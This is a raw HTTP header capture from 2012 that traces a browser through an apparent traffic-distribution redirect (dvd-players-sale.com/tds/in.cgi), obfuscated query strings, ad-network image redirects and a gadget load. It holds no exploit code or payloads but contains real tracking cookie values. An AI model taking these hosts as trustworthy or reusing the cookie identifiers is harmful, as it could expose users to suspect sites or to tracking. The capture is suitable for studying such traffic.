Set-Cookie: CMID=G42HpEPS1IwAAB0dNUMAAABJ;domain=casalemedia.com;path=/;expires=Thu, 07 Nov 2013 16:21:15 GMT CMPS=133;domain=casalemedia.com;path=/;expires=Tue, 05 Feb 2013 16:21:15 GMT CMPP=007;domain=casalemedia.com;path=/;expires=Tue, 05 Feb 2013 16:21:15 GMT CMS=95331&amp;1352305275;domain=casalemedia.com;path=/;expires=Fri, 07 Dec 2012 16:21:15 GMT CMST=UJqKe1CainsB;domain=casalemedia.com;path=/;expires=Thu, 08 Nov 2012 16:21:15 GMT CMSC=UJqKew**;domain=casalemedia.com;path=/; CMDD=AAF0TAE*;domain=casalemedia.com;path=/;expires=Thu, 08 Nov 2012 16:21:15 GMT CMD1=AACjiVCainsAAXRjAAJ00wEAAA**;domain=casalemedia.com;path=/;expires=Fri, 07 Dec 2012 16:21:15 GMT
GET /images/HFTGray.png HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Wed, 25 Jul 2012 23:24:54 GMT
Etag: &quot;c1f5eb2bc6acd1:317&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 672
X-Varnish: 1409312019 1409289180
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /images/HFTGo.png HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Wed, 25 Jul 2012 23:24:07 GMT
Etag: &quot;8c96be96bc6acd1:317&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1430
X-Varnish: 1409312020 1409284102
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /images/img_arrow_right_47597.gif HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Mon, 21 Feb 2011 17:41:09 GMT
Etag: &quot;2ee4e86eed1cb1:31d&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 76
X-Varnish: 1408496640 1408492126
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /tds/in.cgi?7 HTTP/1.1

Host: dvd-players-sale.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 07 Nov 2012 16:21:15 GMT
Content-Length: 12095
Age: 0
Connection: keep-alive
GET /img.aspx?q=L3MkWGAkAQx3ZwVjAwtlBGx5AGL5ZmD0ZPHlAzpyZ3RkZQVyZwMyWGAkqJqaLlHlAGAhWGV1ZaZyZwHlp25yM2cvMKuzrz50oz12LKVhpTW6WGV1ZaZlZQRjWGV1ZaZjAPHlAGWmL3IvM2W0MJ5wqJjgLaZgoayln3MzYJclMzpyZwHlplHlAz4yZ3RjWGV2LlHmpGNyZwMyMvHmpGNyZwMzWGAkWGV2MJpyZ3RlZQRlZGRjAmN5ZwRkAPHlAzA5WGAkZFHlAaEaWGAkWGV2rPHmpFHlAzMapPHmpGNyZwMhrvHmpGNyZwMzpPHmpGV5BPHlAzuhMlHmpGRyZwMjpPHmpHSPWGV2L2tyZ3R2-1 HTTP/1.1

Host: dvd-players-sale.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 07 Nov 2012 16:21:14 GMT
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /jobsearchtools.html/counter.php HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:15 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.8
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /jobsearchtools.html/186/scripts/master.css HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
GET /jobsearchtools.html/scripts/user.js HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
GET /jobsearchtools.html/186/scripts/icwebsiteelement.css HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
GET /scripts/ic_globals_published.js HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Tue, 06 Nov 2012 18:16:21 GMT
Etag: &quot;11c29e7-236-4cdd7995e7ac4&quot;
Accept-Ranges: bytes
Content-Length: 566
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
GET /jobsearchtools.html/scripts/photoalbum.js HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
GET /image-1839237-10298072 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Location: http://www.yceml.net/0728/10298072-20.jpg
Content-Length: 79
Cneonction: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /image-1839237-10641705 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Location: http://www.yceml.net/0297/10641705-6.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /image-1839237-10484790 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Location: http://www.yceml.net/0054/10484790-8.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /image-1839237-10484757 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Location: http://www.yceml.net/0021/10484757-6.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /image-1839237-10484790 HTTP/1.1

Host: www.tqlkg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.tqlkg.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Location: http://www.yceml.net/0054/10484790-8.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /pagead/conversion.js HTTP/1.1

Host: www.googleadservices.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 13183414511898789384
Date: Wed, 07 Nov 2012 01:17:21 GMT
Expires: Thu, 08 Nov 2012 01:17:21 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 2469
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 54235
GET /jobsearchtools.html/186/images/top_back.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=399
Connection: Keep-Alive
GET /image-1839237-10361915 HTTP/1.1

Host: www.ftjcfx.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.ftjcfx.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Content-Length: 50
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /image-1839237-10361944 HTTP/1.1

Host: www.afcyhf.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.afcyhf.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Location: http://www.yceml.net/0088/10361944-9.gif
Content-Length: 78
Cneonction: close
Date: Wed, 07 Nov 2012 16:21:16 GMT
GET /pagead/show_ads.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
If-None-Match: 15032493890200785914
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 11458789474174950078
Date: Wed, 07 Nov 2012 16:01:17 GMT
Expires: Wed, 07 Nov 2012 17:01:17 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5118
X-XSS-Protection: 1; mode=block
Age: 1199
Cache-Control: public, max-age=3600
GET /logos/Logo_25wht.gif HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1607
X-XSS-Protection: 1; mode=block
GET /jobsearchtools.html/186/images/motif01.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=399
Connection: Keep-Alive
GET /ig/ifr?url=http://nuzs.com/promotion.xml&synd=open&w=360&h=340&title=Office+Etiquette+Tips+-+Click+Image+&border=%23ffffff%7C3px%2C1px+solid+%23999999&output=js HTTP/1.1

Host: gmodules.com
GET /ig/ifr?url=http://nuzs.com/promotion.xml&amp;synd=open&amp;w=360&amp;h=340&amp;title=Office+Etiquette+Tips+-+Click+Image+&amp;border=%23ffffff%7C3px%2C1px+solid+%23999999&amp;output=js HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8
Location: http://www.gmodules.com/ig/ifr?url=http://nuzs.com/promotion.xml&amp;synd=open&amp;w=360&amp;h=340&amp;title=Office+Etiquette+Tips+-+Click+Image+&amp;border=%23ffffff%7C3px%2C1px+solid+%23999999&amp;output=js
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: igfe
Content-Length: 405
X-XSS-Protection: 1; mode=block
GET /0054/10484790-8.gif HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
Content-Length: 8872
nnCoection: close
Cache-Control: max-age=409066
Expires: Mon, 12 Nov 2012 09:59:02 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Connection: keep-alive
GET /0021/10484757-6.gif HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
Content-Length: 2448
nnCoection: close
Cache-Control: max-age=441243
Expires: Mon, 12 Nov 2012 18:55:19 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Connection: keep-alive
GET /0728/10298072-20.jpg HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Resin/3.1.8
Content-Length: 20096
nnCoection: close
Cache-Control: max-age=441243
Expires: Mon, 12 Nov 2012 18:55:19 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Connection: keep-alive
GET /0088/10361944-9.gif HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
Content-Length: 11029
Cneonction: close
Cache-Control: max-age=441243
Expires: Mon, 12 Nov 2012 18:55:19 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Connection: keep-alive
GET /0297/10641705-6.gif HTTP/1.1

Host: www.yceml.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Resin/3.1.8
Content-Length: 22956
Cneonction: close
Cache-Control: max-age=441243
Expires: Mon, 12 Nov 2012 18:55:19 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Connection: keep-alive
GET /ig/ifr?url=http://nuzs.com/promotion.xml&synd=open&w=360&h=340&title=Office+Etiquette+Tips+-+Click+Image+&border=%23ffffff%7C3px%2C1px+solid+%23999999&output=js HTTP/1.1

Host: www.gmodules.com
GET /ig/ifr?url=http://nuzs.com/promotion.xml&amp;synd=open&amp;w=360&amp;h=340&amp;title=Office+Etiquette+Tips+-+Click+Image+&amp;border=%23ffffff%7C3px%2C1px+solid+%23999999&amp;output=js HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
